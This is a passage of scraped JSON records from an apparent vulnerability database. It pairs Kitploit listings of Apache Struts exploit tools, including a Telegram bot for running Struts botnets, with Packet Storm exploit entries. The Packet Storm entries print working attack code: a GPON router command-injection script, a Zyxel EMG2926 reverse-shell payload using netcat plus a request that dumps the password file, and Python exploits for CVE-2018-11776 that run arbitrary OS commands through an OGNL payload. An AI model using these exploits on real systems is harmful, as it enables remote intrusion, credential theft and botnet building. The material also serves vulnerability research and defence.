\n\n\n[![](https://3.bp.blogspot.com/-MKbYVQXvBz0/W4LReq3_cJI/AAAAAAAAMQ0/WgNhU5_o5cIwFs69p3T2YIf3xObo_rAtgCLcBGAs/s640/Apache-Struts-v3_1_screen.png)](<https://3.bp.blogspot.com/-MKbYVQXvBz0/W4LReq3_cJI/AAAAAAAAMQ0/WgNhU5_o5cIwFs69p3T2YIf3xObo_rAtgCLcBGAs/s1600/Apache-Struts-v3_1_screen.png>)\n\n \nScript contains the fusion of 3 RCE vulnerabilities on ApacheStruts, it also has the ability to create server shells. \n \n**SHELL** \n**php** `finished` \n**jsp** `process` \n \n**CVE ADD** \n**CVE-2013-2251** `'action:', 'redirect:' and 'redirectAction'` \n**CVE-2017-5638** `Content-Type` \n**CVE-2018-11776** `'redirect:' and 'redirectAction'` \n \n \n\n\n**[Download Apache-Struts-v3](<https://github.com/s1kr10s/Apache-Struts-v3>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-26T21:14:00", "type": "kitploit", "title": "Apache Struts v3 - Tool To Exploit 3 RCE Vulnerabilities On ApacheStruts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-08-26T21:14:01", "id": "KITPLOIT:4611207874033525364", "href": "http://www.kitploit.com/2018/08/apache-struts-v3-tool-to-exploit-3-rce.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-19T15:27:47", "description": "[![](https://1.bp.blogspot.com/-9cslz9huO_U/XYAeBJbmtNI/AAAAAAAAQXo/vfBLw3xqV-stKkRe0MzCd4fOhcbHSMVCwCNcBGAsYHQ/s640/mitaka_8_eyecatch.png)](<https://1.bp.blogspot.com/-9cslz9huO_U/XYAeBJbmtNI/AAAAAAAAQXo/vfBLw3xqV-stKkRe0MzCd4fOhcbHSMVCwCNcBGAsYHQ/s1600/mitaka_8_eyecatch.png>)\n\n \nMitaka is a browser extension for [OSINT](<https://www.kitploit.com/search/label/OSINT> \"OSINT\" ) search which can: \n\n\n * Extract & refang IoC from a selected block of text. \n * E.g. `example[.]com` to `example.com`, `test[at]example.com` to `some-email@example.com`, `hxxp://example.com` to `http://example.com`, etc.\n * Search / scan it on various engines. \n * E.g. VirusTotal, urlscan.io, Censys, Shodan, etc.\n \n**Features** \n \n**Supported IOC types** \nname | desc. | e.g. \n---|---|--- \ntext | Freetext | any string(s) \nip | IPv4 address | `8.8.8.8` \ndomain | Domain name | `github.com` \nurl | URL | `https://github.com` \nemail | Email address | `some-email@example.com` \nasn | ASN | `AS13335` \nhash | md5 / sha1 / sha256 | `44d88612fea8a8f36de82e1278abb02f` \ncve | CVE number | `CVE-2018-11776` \nbtc | BTC address | `1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa` \ngaPubID | Google Adsense Publisher ID | `pub-9383614236930773` \ngaTrackID | Google [Analytics](<https://www.kitploit.com/search/label/Analytics> \"Analytics\" ) Tracker ID | `UA-67609351-1` \n \n**Supported search engines** \nname | url | supported types \n---|---|--- \nAbuseIPDB | [https://www.abuseipdb.com](<https://www.abuseipdb.com/> \"https://www.abuseipdb.com\" ) | ip \narchive.org | [https://archive.org](<https://archive.org/> \"https://archive.org\" ) | url \narchive.today | [http://archive.fo](<http://archive.fo/> \"http://archive.fo\" ) | url \nBGPView | [https://bgpview.io](<https://bgpview.io/> \"https://bgpview.io\" ) | ip / asn \nBinaryEdge | [https://app.binaryedge.io](<https://app.binaryedge.io/> \"https://app.binaryedge.io\" ) | ip / domain \nBitcoinAbuse | [https://www.bitcoinabuse.com](<https://www.bitcoinabuse.com/> \"https://www.bitcoinabuse.com\" ) | btc \nBlockchain.com | [https://www.blockchain.com](<https://www.blockchain.com/> \"https://www.blockchain.com\" ) | btc \nBlockCypher | [https://live.blockcypher.com](<https://live.blockcypher.com/> \"https://live.blockcypher.com\" ) | btc \nCensys | [https://censys.io](<https://censys.io/> \"https://censys.io\" ) | ip / domain / asn / text \ncrt.sh | [https://crt.sh](<https://crt.sh/> \"https://crt.sh\" ) | domain \nDNSlytics | [https://dnslytics.com](<https://dnslytics.com/> \"https://dnslytics.com\" ) | ip / domain \nDomainBigData | [https://domainbigdata.com](<https://domainbigdata.com/> \"https://domainbigdata.com\" ) | domain \nDomainTools | [https://www.domaintools.com](<https://www.domaintools.com/> \"https://www.domaintools.com\" ) | ip / domain \nDomainWatch | [https://domainwat.ch](<https://domainwat.ch/> \"https://domainwat.ch\" ) | domain / email \nEmailRep | [https://emailrep.io](<https://emailrep.io/> \"https://emailrep.io\" ) | email \nFindSubDomains | [https://findsubdomains.com](<https://findsubdomains.com/> \"https://findsubdomains.com\" ) | domain \nFOFA | [https://fofa.so](<https://fofa.so/> \"https://fofa.so\" ) | ip / domain \nFortiGuard | [https://fortiguard.com](<https://fortiguard.com/> \"https://fortiguard.com\" ) | ip / url / cve \nGoogle Safe Browsing | [https://transparencyreport.google.com](<https://transparencyreport.google.com/> \"https://transparencyreport.google.com\" ) | domain / url \nGreyNoise | [https://viz.greynoise.io](<https://viz.greynoise.io/> \"https://viz.greynoise.io\" ) | ip / domain / asn \nHashdd | [https://hashdd.com](<https://hashdd.com/> \"https://hashdd.com\" ) | ip / domain / hash \nHybridAnalysis | [https://www.hybrid-analysis.com](<https://www.hybrid-analysis.com/> \"https://www.hybrid-analysis.com\" ) | ip / domain / hash (sha256 only) \nIntelligence X | [https://intelx.io](<https://intelx.io/> \"https://intelx.io\" ) | ip / domain / url / email / btc \nIPinfo | [https://ipinfo.io](<https://ipinfo.io/> \"https://ipinfo.io\" ) | ip / asn \nIPIP | [https://en.ipip.net](<https://en.ipip.net/> \"https://en.ipip.net\" ) | ip / asn \nJoe Sandbox | [https://www.joesandbox.com](<https://www.joesandbox.com/> \"https://www.joesandbox.com\" ) | hash \nMalShare | [https://malshare.com](<https://malshare.com/> \"https://malshare.com\" ) | hash \nMaltiverse | [https://www.maltiverse.com](<https://www.maltiverse.com/> \"https://www.maltiverse.com\" ) | domain / hash \nNVD | [https://nvd.nist.gov](<https://nvd.nist.gov/> \"https://nvd.nist.gov\" ) | cve \nOOCPR | [https://data.occrp.org](<https://data.occrp.org/> \"https://data.occrp.org\" ) | email \nONYPHE | [https://www.onyphe.io](<https://www.onyphe.io/> \"https://www.onyphe.io\" ) | ip \nOTX | [https://otx.alienvault.com](<https://otx.alienvault.com/> \"https://otx.alienvault.com\" ) | ip / domain / hash \nPubDB | [http://pub-db.com](<http://pub-db.com/> \"http://pub-db.com\" ) | gaPubID / gaTrackID \nPublicWWW | [https://publicwww.com](<https://publicwww.com/> \"https://publicwww.com\" ) | text \nPulsedive | [https://pulsedive.com](<https://pulsedive.com/> \"https://pulsedive.com\" ) | ip / domaion / url / hash \nRiskIQ | [http://community.riskiq.com](<http://community.riskiq.com/> \"http://community.riskiq.com\" ) | ip / domain / email / gaTrackID \nSecurityTrails | [https://securitytrails.com](<https://securitytrails.com/> \"https://securitytrails.com\" ) | ip / domain / email \nShodan | [https://www.shodan.io](<https://www.shodan.io/> \"https://www.shodan.io\" ) | ip / domain / asn \nSploitus | [https://sploitus.com](<https://sploitus.com/> \"https://sploitus.com\" ) | cve \nSpyOnWeb | [http://spyonweb.com](<http://spyonweb.com/> \"http://spyonweb.com\" ) | ip / domain / gaPubID / gaTrackID \nTalos | [https://talosintelligence.com](<https://talosintelligence.com/> \"https://talosintelligence.com\" ) | ip / domain \nThreatConnect | [https://app.threatconnect.com](<https://app.threatconnect.com/> \"https://app.threatconnect.com\" ) | ip / domain / email \nThreatCrowd | [https://www.threatcrowd.org](<https://www.threatcrowd.org/> \"https://www.threatcrowd.org\" ) | ip / domain / email \nThreatMiner | [https://www.threatminer.org](<https://www.threatminer.org/> \"https://www.threatminer.org\" ) | ip / domain / hash \nTIP | [https://threatintelligenceplatform.com](<https://threatintelligenceplatform.com/> \"https://threatintelligenceplatform.com\" ) | ip / domain \nUrlscan | [https://urlscan.io](<https://urlscan.io/> \"https://urlscan.io\" ) | ip / domain / asn / url \nViewDNS | [https://viewdns.info](<https://viewdns.info/> \"https://viewdns.info\" ) | ip / domain / email \nVirusTotal | [https://www.virustotal.com](<https://www.virustotal.com/> \"https://www.virustotal.com\" ) | ip / domain / url / hash \nVulmon | [https://vulmon.com](<https://vulmon.com/> \"https://vulmon.com\" ) | cve \nVulncodeDB | [https://www.vulncode-db.com](<https://www.vulncode-db.com/> \"https://www.vulncode-db.com\" ) | cve \nVxCube | [http://vxcube.com](<http://vxcube.com/> \"http://vxcube.com\" ) | ip / domain / hash \nWebAnalyzer | [https://wa-com.com](<https://wa-com.com/> \"https://wa-com.com\" ) | domain \nWe Leak Info | [https://weleakinfo.com](<https://weleakinfo.com/> \"https://weleakinfo.com\" ) | email \nX-Force Exchange | [https://exchange.xforce.ibmcloud.com](<https://exchange.xforce.ibmcloud.com/> \"https://exchange.xforce.ibmcloud.com\" ) | ip / domain / hash \nZoomEye | [https://www.zoomeye.org](<https://www.zoomeye.org/> \"https://www.zoomeye.org\" ) | ip \n \n**Supported scan engines** \nname | url | supported types \n---|---|--- \nUrlscan | [https://urlscan.io](<https://urlscan.io/> \"https://urlscan.io\" ) | ip / domain / url \nVirusTotal | [https://www.virustotal.com](<https://www.virustotal.com/> \"https://www.virustotal.com\" ) | url \n \n**Downloads** \n\n\n * Chrome: <https://chrome.google.com/webstore/detail/mitaka/bfjbejmeoibbdpfdbmbacmefcbannnbg>\n * FireFox: <https://addons.mozilla.org/en-US/firefox/addon/mitaka/>\n \n**How to use** \nThis browser extension shows context menus based on a type of IoC you selected and then you can choose what you want to search / scan on. \n \n**Examples:** \n \n\n\n[![](https://1.bp.blogspot.com/-2tdM6fuXGfQ/XYAeOc1TdNI/AAAAAAAAQXs/o9Yh-_pJEdwOcF-5KM-3Hj9CjQSlHLl5wCNcBGAsYHQ/s640/mitaka_9_1.gif)](<https://1.bp.blogspot.com/-2tdM6fuXGfQ/XYAeOc1TdNI/AAAAAAAAQXs/o9Yh-_pJEdwOcF-5KM-3Hj9CjQSlHLl5wCNcBGAsYHQ/s1600/mitaka_9_1.gif>)\n\n \n\n\n[![](https://1.bp.blogspot.com/-4t9b6shG_iQ/XYAeOVytJkI/AAAAAAAAQXw/b4P4PJz5gU0lDqmKpJ9dL3jhiUVXkhOxwCNcBGAsYHQ/s640/mitaka_10_2.gif)](<https://1.bp.blogspot.com/-4t9b6shG_iQ/XYAeOVytJkI/AAAAAAAAQXw/b4P4PJz5gU0lDqmKpJ9dL3jhiUVXkhOxwCNcBGAsYHQ/s1600/mitaka_10_2.gif>)\n\n \n**Note:** \nPlease set your urlscan.io & [VirusTotal](<https://www.kitploit.com/search/label/VirusTotal> \"VirusTotal\" ) API keys in the options page for enabling urlscan.io & VirusTotal scans. \n \n**Options** \nYou can enable / disable a search engine on the options page based on your preference. \n \n\n\n[![](https://1.bp.blogspot.com/-dP_LGUSsF1M/XYAeT14bPsI/AAAAAAAAQX0/U7gyifaFxOgCv92e0_k0fugVzaLMShGIACNcBGAsYHQ/s640/mitaka_11_options.png)](<https://1.bp.blogspot.com/-dP_LGUSsF1M/XYAeT14bPsI/AAAAAAAAQX0/U7gyifaFxOgCv92e0_k0fugVzaLMShGIACNcBGAsYHQ/s1600/mitaka_11_options.png>)\n\n \n**About Permissons** \nThis browser extension requires the following permissions. \n\n\n * `Read and change all your data on the websites you visit`: \n * This extension creates context menus dynamically based on what you select on a website.\n * It means this extension requires reading all your data on the websites you visit. (This extension doesn't change anything on the websites)\n * `Display notifications`: \n * This extension makes a notification when something goes wrong.\nI don't (and will never) collect any information from the users. \n \n**Alternatives or Similar Tools** \n\n\n * [CrowdScrape](<https://chrome.google.com/webstore/detail/crowdscrape/jjplaeklnlddpkbbdbnogmppffokemej> \"CrowdScrape\" )\n * [Gotanda](<https://github.com/HASH1da1/Gotanda> \"Gotanda\" )\n * [Sputnik](<https://github.com/mitchmoser/sputnik> \"Sputnik\" )\n * [ThreatConnect Integrated ](<https://chrome.google.com/webstore/detail/threatconnect-integrated/lblgcphpihpadjdpjgjnnoikjdjcnkbh> \"ThreatConnect Integrated \" )[Chrome](<https://www.kitploit.com/search/label/Chrome> \"Chrome\" ) Extension\n * [ThreatPinch Lookup](<https://github.com/cloudtracer/ThreatPinchLookup> \"ThreatPinch Lookup\" )\n * [VTchromizer](<https://chrome.google.com/webstore/detail/vtchromizer/efbjojhplkelaegfbieplglfidafgoka> \"VTchromizer\" )\n \n**How to build (for developers)** \nThis browser extension is written in [TypeScript](<https://www.typescriptlang.org/> \"TypeScript\" ) and built by [webpack](<https://webpack.js.org/> \"webpack\" ). \nTypeScript files will start out in `src` directory, run through the TypeScript compiler, then webpack, and end up in JavaScript files in `dist` directory. \n\n \n \n git clone https://github.com/ninoseki/mitaka.git\n cd mitaka\n npm install\n npm run test\n npm run build\n\nFor loading an unpacked extension, please follow the procedures described at <https://developer.chrome.com/extensions/getstarted>. \n \n**Misc** \nMitaka/\u898b\u305f\u304b means \"Have you seen it?\" in Japanese. \n \n \n\n\n**[Download Mitaka](<https://github.com/ninoseki/mitaka> \"Download Mitaka\" )**\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-21T12:00:00", "type": "kitploit", "title": "Mitaka - A Browser Extension For OSINT Search", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2019-09-21T12:00:07", "id": "KITPLOIT:8708017483803645203", "href": "http://www.kitploit.com/2019/09/mitaka-browser-extension-for-osint.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:19:29", "description": "[![](https://2.bp.blogspot.com/-11EAxL668ng/WMfWw388UFI/AAAAAAAAHa8/FeOT6wUDm_s_Ro41Cs6Ttq7cMXH5BPATQCLcB/s1600/struts-pwn.png)](<https://2.bp.blogspot.com/-11EAxL668ng/WMfWw388UFI/AAAAAAAAHa8/FeOT6wUDm_s_Ro41Cs6Ttq7cMXH5BPATQCLcB/s1600/struts-pwn.png>)\n\n \n** An exploit for Apache Struts CVE-2017-5638** \n \n** ** Usage ** ** \n \n** Testing a single URL. ** \n\n \n \n python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id'\n\n \n** Testing a list of URLs. ** \n\n \n \n python struts-pwn.py --list 'urls.txt' -c 'id'\n\n \n** Checking if the vulnerability exists against a single URL. ** \n\n \n \n python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action'\n\n \n** Checking if the vulnerability exists against a list of URLs. ** \n\n \n \n python struts-pwn.py --check --list 'urls.txt'\n\n \n** ** Requirements ** ** \n\n\n * Python2 or Python3 \n * requests \n \n** ** Legal Disclaimer ** ** \nThis project is made for educational and ethical testing purposes only. Usage of struts-pwn for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. \n \n** ** Author ** ** \n_ Mazin Ahmed _ \n\n\n * Website: [ https://mazinahmed.net ](<https://mazinahmed.net/>)\n * Email: _ mazin AT mazinahmed DOT net _\n * Twitter: [ https://twitter.com/mazen160 ](<https://twitter.com/mazen160>)\n * Linkedin: [ http://linkedin.com/in/infosecmazinahmed](<http://linkedin.com/in/infosecmazinahmed>)\n \n\n\n** [ Download struts-pwn ](<https://github.com/mazen160/struts-pwn>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-14T13:34:00", "type": "kitploit", "title": "struts-pwn - An exploit for Apache Struts CVE-2017-5638", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T13:34:05", "id": "KITPLOIT:1841841790447853746", "href": "http://www.kitploit.com/2017/03/struts-pwn-exploit-for-apache-struts.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-11T00:37:47", "description": "[![](https://4.bp.blogspot.com/-ueegtNhcGOM/WMtkR8p9hRI/AAAAAAAAHbo/eHq-bF-Q2GgzOPgzXd9XIaTs4L-JlNr7wCLcB/s640/Struts2Shell.png)](<https://4.bp.blogspot.com/-ueegtNhcGOM/WMtkR8p9hRI/AAAAAAAAHbo/eHq-bF-Q2GgzOPgzXd9XIaTs4L-JlNr7wCLcB/s1600/Struts2Shell.png>)\n\n \nImproves manipulation and sending commands to the vulnerable Apache Struts server using a shell. \n \n**Usage:** \n\n \n \n python Struts2Shell.py\n\n \n\n\n** [ Download Struts2Shell ](<https://github.com/s1kr10s/Struts2Shell>) **\n", "cvss3": {}, "published": "2017-03-17T14:22:00", "type": "kitploit", "title": "Struts2Shell - Interactive Shell Command to Exploit Apache Struts CVE-2017-5638", "bulletinFamily": "tools", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-17T14:22:01", "id": "KITPLOIT:2304674796555328667", "href": "http://www.kitploit.com/2017/03/struts2shell-interactive-shell-command.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-23T15:19:28", "description": "[![](https://2.bp.blogspot.com/-XZN2TA7nQZ0/WGSL3ia76KI/AAAAAAAAGuE/8pxmxtrizn8Yu1Y6iIArXYBgsL3Rhww3ACLcB/s320/telegram-bot.png)](<https://2.bp.blogspot.com/-XZN2TA7nQZ0/WGSL3ia76KI/AAAAAAAAGuE/8pxmxtrizn8Yu1Y6iIArXYBgsL3Rhww3ACLcB/s1600/telegram-bot.png>)\n\n \nTelegram Bot to manage botnets created with struts vulnerability(CVE-2017-5638) \n \n** Dependencies ** \n\n \n \n pip install -r requeriments.txt \n\n \n** Config ** \n\n \n \n Create a telegram bot, save the API token in config/token.conf\n Create a telegram group, save the group id in config/group.conf\n\n \n** Start ** \npython strutszeiro.py \n \n** Telegram Usage ** \n\n \n \n /add url - test vulnerability and add the new server\n /exploit url *cmd - execute commands in a specific server (you need to use the * caracter)\n /botnet cmd - execute commands in all servers\n /list - show all servers in botnet\n /total - show total of servers in botnet\n\nThanks to [ @btamburi ](<https://twitter.com/BrenoTamburi>) \n \n \n\n\n** [ Download strutszeiro ](<https://github.com/mthbernardes/strutszeiro>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2017-03-14T17:30:00", "type": "kitploit", "title": "strutszeiro - Telegram Bot to manage botnets created with struts vulnerability (CVE-2017-5638)", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T17:30:13", "id": "KITPLOIT:9079806502812490909", "href": "http://www.kitploit.com/2017/03/strutszeiro-telegram-bot-to-manage.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-05-07T01:19:11", "description": "", "cvss3": {}, "published": "2018-05-04T00:00:00", "type": "packetstorm", "title": "GPON Router Authentication Bypass / Comand Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-10562", "CVE-2018-10561"], "modified": "2018-05-04T00:00:00", "id": "PACKETSTORM:147482", "href": "https://packetstormsecurity.com/files/147482/GPON-Router-Authentication-Bypass-Comand-Injection.html", "sourceData": "`#!/bin/bash \n \necho \"[+] Sending the Commanda| \" \n# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices \ncurl -k -d \"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\\`$2\\`;$2&ipv=0\" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null \necho \"[+] Waitinga|.\" \nsleep 3 \necho \"[+] Retrieving the ouputa|.\" \ncurl -k $1/diag.html?images/ 2>/dev/null | grep adiag_result = a | sed -e as/\\\\n/\\n/ga \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/147482/gpon-bypassinject.txt"}, {"lastseen": "2017-04-10T01:24:12", "description": "", "cvss3": {}, "published": "2017-04-02T00:00:00", "type": "packetstorm", "title": "Zyxel / EMG2926 Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-6884"], "modified": "2017-04-02T00:00:00", "id": "PACKETSTORM:141900", "href": "https://packetstormsecurity.com/files/141900/Zyxel-EMG2926-Command-Injection.html", "sourceData": "`# Exploit Title: Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection \n# Date: 2017-04-02 \n# Exploit Author: Fluffy Huffy (trevor Hough) \n# Vendor Homepage: www.zyxel.com \n# Version: EMG2926 - V1.00(AAQT.4)b8 \n# Tested on: linux \n# CVE : CVE-2017-6884 \n \nOS command injection vulnerability was discovered in a commonly used \nhome router (zyxel - EMG2926 - V1.00(AAQT.4)b8). The vulnerability is located in the diagnostic tools \nspecify the nslookup function. A malicious user may exploit numerous \nvectors to execute arbitrary commands on the router. \n \nExploit (Reverse Shell) \nhttps://192.168.0.1/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button& \nping_ip=google.ca%20%3B%20nc%20192.168.0.189%204040%20-e%20/p \n \nExploit (Dump Password File) \nRequest \nGET /cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20cat%20/etc/passwd&server_ip= HTTP/1.1 \nHost: 192.168.0.1 \nUpgrade-Insecure-Requests: 1 \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \nReferer: http://192.168.0.1/cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup \nAccept-Language: en-US,en;q=0.8 \nCookie: csd=9; sysauth=<Clipped> \nConnection: close \n \nResponse (Clipped) \n<textarea cols=\"80\" rows=\"15\" readonly=\"true\">root:x:0:0:root:/root:/bin/ash \ndaemon:*:1:1:daemon:/var:/bin/false \nftp:*:55:55:ftp:/home/ftp:/bin/false \nnetwork:*:101:101:network:/var:/bin/false \nnobody:*:65534:65534:nobody:/var:/bin/false \nsupervisor:$1$RM8l7snU$KW2C58L2Ijt0th1ThR70q0:0:0:supervisor:/:/bin/ash \nadmin:$1$<Clipped>:0:0:admin:/:/bin/fail \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141900/zyxelemg-exec.txt"}, {"lastseen": "2018-08-27T17:58:42", "description": "", "cvss3": {}, "published": "2018-08-25T00:00:00", "type": "packetstorm", "title": "Apache Struts 2.3 / 2.5 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-25T00:00:00", "id": "PACKETSTORM:149087", "href": "https://packetstormsecurity.com/files/149087/Apache-Struts-2.3-2.5-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \n# -*- coding: utf-8 -*- \n \n# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter \n \nimport sys \nimport urllib \nimport urllib2 \nimport httplib \n \n \ndef exploit(host,cmd): \nprint \"[Execute]: {}\".format(cmd) \n \nognl_payload = \"${\" \nognl_payload += \"(#_memberAccess['allowStaticMethodAccess']=true).\" \nognl_payload += \"(#cmd='{}').\".format(cmd) \nognl_payload += \"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).\" \nognl_payload += \"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd})).\" \nognl_payload += \"(#p=new java.lang.ProcessBuilder(#cmds)).\" \nognl_payload += \"(#p.redirectErrorStream(true)).\" \nognl_payload += \"(#process=#p.start()).\" \nognl_payload += \"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).\" \nognl_payload += \"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).\" \nognl_payload += \"(#ros.flush())\" \nognl_payload += \"}\" \n \nif not \":\" in host: \nhost = \"{}:8080\".format(host) \n \n# encode the payload \nognl_payload_encoded = urllib.quote_plus(ognl_payload) \n \n# further encoding \nurl = \"http://{}/{}/help.action\".format(host, ognl_payload_encoded.replace(\"+\",\"%20\").replace(\" \", \"%20\").replace(\"%2F\",\"/\")) \n \nprint \"[Url]: {}\\n\\n\\n\".format(url) \n \ntry: \nrequest = urllib2.Request(url) \nresponse = urllib2.urlopen(request).read() \nexcept httplib.IncompleteRead, e: \nresponse = e.partial \nprint response \n \n \nif len(sys.argv) < 3: \nsys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0]) \nelse: \nexploit(sys.argv[1],sys.argv[2]) \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149087/apachestruts23252-exec.txt"}, {"lastseen": "2018-08-27T17:58:42", "description": "", "cvss3": {}, "published": "2018-08-26T00:00:00", "type": "packetstorm", "title": "Apache Struts 2.3 / 2.5 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-26T00:00:00", "id": "PACKETSTORM:149086", "href": "https://packetstormsecurity.com/files/149086/Apache-Struts-2.3-2.5-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/env python3 \n# coding=utf-8 \n# ***************************************************** \n# struts-pwn: Apache Struts CVE-2018-11776 Exploit \n# Author: \n# Mazin Ahmed <Mazin AT MazinAhmed DOT net> \n# This code uses a payload from: \n# https://github.com/jas502n/St2-057 \n# ***************************************************** \n \nimport argparse \nimport random \nimport requests \nimport sys \ntry: \nfrom urllib import parse as urlparse \nexcept ImportError: \nimport urlparse \n \n# Disable SSL warnings \ntry: \nimport requests.packages.urllib3 \nrequests.packages.urllib3.disable_warnings() \nexcept Exception: \npass \n \nif len(sys.argv) <= 1: \nprint('[*] CVE: 2018-11776 - Apache Struts2 S2-057') \nprint('[*] Struts-PWN - @mazen160') \nprint('\\n%s -h for help.' % 